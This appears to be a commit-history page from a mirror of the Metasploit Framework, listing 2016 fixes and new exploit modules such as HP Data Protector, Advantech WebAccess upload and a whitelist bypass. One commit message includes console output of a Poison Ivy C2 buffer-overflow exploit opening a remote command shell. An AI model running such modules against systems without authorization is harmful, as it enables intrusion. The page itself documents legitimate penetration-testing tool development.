infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
38,852 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

5083 Commits (c23be2bb79d9b5e90b5171681c3371cd5c05e3d2)

Author SHA1 Message Date
wchen-r7 45401bfe45
Land #7069, modify check codes in multiple local exploits 2016-07-06 00:04:24 -05:00
Brendan e29d5b9efe
Land #6954, Fix the available size of payload for exploit/.../payload_inject 2016-07-05 07:38:27 -07:00
Clément Notin 0f8efec001 Fix modules broken by @wchen-r7 's 4275a65407 commit. 
These modules call check() in the exploit() function and expected to get a CheckCode::Vulnerable, now that check() returns Appears instead of Vulnerable they always refuse to run.
I've flipped the logic, based on examples in other modules, now they refuse to run only if check() positively returns Safe.
 2016-07-05 13:49:14 +02:00
Pearce Barry 12812650c0
Land #7054, Fix busted alpha encoding on ms02_018_htr 2016-07-02 17:07:25 -05:00
James Lee 3850431966
Fix busted alpha encoding on this old-ass exploit 2016-07-01 17:20:00 -05:00
William Vu a1bd640eff Fix hashrocket alignment 2016-07-01 09:05:03 -05:00
William Webb 1401a61f59
Land #6998, Fix #6984 Undefined method 'winver' in ms10_092_schelevator 2016-06-30 16:14:09 -05:00
wchen-r7 2b85b210e9 Fix #6984, Undefined method 'winver' in ms10_092_schelevator 
Fix #6984
 2016-06-20 10:37:41 -05:00
William Vu 6cb2a6970e Fix unused SessionType in two modules 
Pretty sure it should be "shell."
 2016-06-19 23:41:34 -05:00
Trenton Ivey 3a39d8020d Moving back to PSH option only 2016-06-13 12:44:21 -05:00
Trenton Ivey 52bbd22a81 Moving back to PSH option only 2016-06-13 12:10:48 -05:00
Trenton Ivey 8c7796c6d3 Module Cleanup 2016-06-11 18:12:42 -05:00
Trenton Ivey 46eff4c96d Added command option 2016-06-11 18:07:24 -05:00
Trenton Ivey 6af3c4ab99 Added zero to Run method to prevent popup 2016-06-10 14:52:02 -05:00
Trenton Ivey 17974d74e2 Removing space at end of line 2016-06-09 21:49:24 -05:00
Trenton Ivey 6cd1da414f Regsvr32.exe Application Whitelist Bypass Server 2016-06-09 21:15:07 -05:00
Brent Cook b0bf901b22
Land #6950, avoid printing rhost:rport twice when using Msf::Exploit::Remote::SMB::Client 2016-06-09 16:35:09 -05:00
ssyy201506 d470371694 fix the available size of payload for exploit/windows/local/payload_injection 2016-06-09 13:40:25 +09:00
wchen-r7 52bcade72c Fix #6948, Modules using the SMB client are printing peer twice 
Fix #6948
 2016-06-08 12:16:50 -05:00
wwebb-r7 ab27c1b701 Merge pull request #6940 from samvartaka/master 
Exploit for previously unknown stack buffer overflow in Poison Ivy versions 2.1.x (possibly present in older versions too)
 2016-06-08 11:25:51 -05:00
samvartaka 5260031991 Modifications based on suggestions by @wchen-r7 2016-06-08 01:17:15 +02:00
wchen-r7 60c60bf004 Minor cosmetic changes 2016-06-06 22:45:00 -05:00
samvartaka 290e1eb0fa This module exploits a previously unknown stack buffer overflow vulnerability 
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't
require knowledge of the secret key as it abuses a flaw in the cryptographic protocol.
Note that this is a different vulnerability from the one affecting versions 2.2.0 and up
(https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof).

See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.

## Console output

Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is
set to 'pivypass' and unknown to attacker).

### Version 2.1.4

```
msf > use windows/misc/poisonivy_21x_bof
msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf exploit(poisonivy_21x_bof) > check
[*] 192.168.0.104:3460 The target appears to be vulnerable.
msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_21x_bof) > exploit
[*] 192.168.0.104:3460 - Performing handshake...

[*] Started bind handler
[*] 192.168.0.104:3460 - Sending exploit...
[*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4>
```
 2016-06-03 19:20:06 +02:00
root d72492fe30 Add support for older Data Protector versions 
Increases support by enabling all SSL ciphers. Some older versions
of DP only support weaker export ciphers not enabled by default.
 2016-06-01 10:45:47 +01:00
Ian Lovering eb2398a446 Renamed hp_dataprotector_encrypted_comms 
Renamed to match other data protector exploits
 2016-05-31 22:58:32 +01:00
Ian Lovering 54c4771626 Exploit for HP Data Protector Encrypted Comms 
Added exploit for HP Data Protector when using encrypted communications.

This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.
 2016-05-31 22:44:14 +01:00
wchen-r7 fb678564b1
Land #6923, Check the correct check code for ms13_081_track_popup_menu 2016-05-31 11:40:02 -05:00
wchen-r7 506356e15d
Land #6889, check #nil? and #empty? instead of #empty? 2016-05-19 19:23:04 -05:00
wchen-r7 99a573a013 Do unless instead "if !" to follow the Ruby guideline 2016-05-19 19:21:45 -05:00
ssyy201506 31bbcfca49 Fix ms13_081_track_popup_menu 2016-05-19 17:22:47 +09:00
Vex Woo b5284375a7 osb_uname_jlist - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-18 00:16:53 -05:00
Vex Woo 11fedd7353 ca_totaldefense_regeneratereports - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-18 00:15:28 -05:00
Vex Woo a6405beeda ams_hndlrsvc - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-18 00:13:40 -05:00
Vex Woo 68b83c6e3a datastore['CMD'].blank? 2016-05-17 23:56:59 -05:00
Vex Woo a4e7e373f3 fix ams_xfr.rb - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-17 17:55:18 -05:00
Brent Cook 0d176f2c92 remove a couple of unnecessary ternary ops 2016-05-14 11:07:43 -05:00
wchen-r7 3b5db26ff5 Fix #6872, change upload action for CVE-2016-0854 exploit 
This patch includes the following changes:

* Instead of the uploadFile action, this patch uses uploadImageCommon
  to be able to support both Advantech WebAccess builds: 2014 and
  2015.
* It uses an explicit check instead of the passive version check.
* It cleans up the malicious file after getting a session.
* Added module documentation to explain the differences between
  different builds of Advantech WebAccess 8.0s, and 8.1.

Fix #6872
 2016-05-13 19:47:18 -05:00
Vex Woo 35a780c6a8 fix send_request_cgi redirection issues #6806 2016-05-05 09:55:32 -05:00
wchen-r7 4a435e8d13
Bring hp_dataprotector_install_service up to date w/ upstream-master 2016-04-22 13:42:41 -05:00
wchen-r7 db1d973ef0 Cosmetic changes for hp_dataprotector_install_service 2016-04-22 13:41:18 -05:00
dmohanty-r7 67968e912c
Land #6785 Add CVE-2016-0854 Advantech WebAccess Arbitrary File Upload 2016-04-21 12:02:04 -05:00
504137480 c08872144f Update advantech_webaccess_dashboard_file_upload.rb 2016-04-21 09:33:03 +08:00
504137480 dcb9c83f98 Update advantech_webaccess_dashboard_file_upload.rb 2016-04-21 09:28:42 +08:00
Brent Cook 57cb8e49a2 remove overwritten keys from hashes 2016-04-20 07:43:57 -04:00
504137480 2400345fff Merge pull request #2 from open-security/advantech_webaccess_dashboard_file_upload 
Advantech webaccess dashboard file upload
 2016-04-19 12:59:32 +08:00
join-us 0407acc0ec add print_status with vuln_version? 2016-04-19 11:22:00 +08:00
join-us c88ddf1cc4 fix NilClass for res.body 2016-04-19 10:27:20 +08:00
xiaozhouzhou a895b452e6 fix 2016-04-19 00:21:26 +08:00
join-us ce9b692dd8 add print_status 2016-04-18 20:43:39 +08:00
join-us 7143668671 fix version_match 2016-04-18 20:31:32 +08:00